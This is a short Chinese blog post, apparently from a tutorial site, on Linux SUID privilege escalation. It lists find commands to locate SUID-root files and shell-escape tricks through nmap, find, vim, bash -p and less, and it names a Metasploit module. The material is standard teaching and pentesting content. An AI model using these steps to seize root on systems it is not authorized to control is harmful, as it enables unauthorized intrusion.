【提权】Linux的SUID提权

0x01 SUID

什么是suid?通俗的理解为其他用户执行这个程序的时候可以用该程序所有者/组的权限。

0x02 SUID提权

那么什么是suid提权呢?我理解的就是有个文件,它有s标志,并且他输入root,那么我们运行这个程序就可以有了root的权限,并且这个程序还得能执行命令,不然没什么用处,那么我们就能从普通用户提升到了root权限了。

0x03 常见的可用于suid提权的命令

Nmap

Vim

find

Bash

More

Less

Nano

cp

0x04 查找符合条件的文件

find / -user root -perm -4000 -print 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
find / -user root -perm -4000 -exec ls -ldb {} \;

0x05 详细介绍

  • nmap
    老版的nmap(2.02-5.21)有相互的功能--interactive
nmap> !sh
sh-3.2# whoami
root

msf中也有相关的模块

exploit/unix/local/setuid_nmap
  • find

如果find以SUID权限运行,所有通过find执行的命令都会以root权限运行。

touch test
find test -exec whoami \;
  • vim

如果vim以SUID运行,就会继承root用户的权限,可以读取系统中所有的文件

vim/vi
:shell
  • bash
bash -p
># id
  • less/more
less /etc/passwd
!/bin/sh
©著作权归作者所有,转载或内容合作请联系作者
平台声明:文章内容(如有图片或视频亦包括在内)由作者上传并发布,文章内容仅代表作者本人观点,简书系信息发布平台,仅提供信息存储服务。

推荐阅读更多精彩内容

  • trial
    Lied together, fucked together, parted forever
    无流写手阅读 283评论 0 0
  • 7.焚羽
    壹鳥翔于寰宇,名“荊棘”,覓蘭草、秭歸、帝嚳後裔,卻聖于翼短而不得,飛入雲霄,展翅卻察憂,觀寰宇霸天下志,卻若蘭陵...
    戒子猪阅读 247评论 0 1
  • 立冬该吃什么?
    ✴萝卜排骨汤 今天是立冬节气,民谚有“立冬萝卜赛参汤,不劳医生开药方”,白萝卜有一定的润肺止咳功效。白萝卜中富含大...
    创客阿琼阅读 326评论 0 0
  • 雨后蜗牛
    雨后蜗牛 ————呓语 雨后的清晨 小区内 沿街非机动车道上 不少蜗牛涌现出来 一套与自...
    蜗牛跳舞阅读 770评论 0 2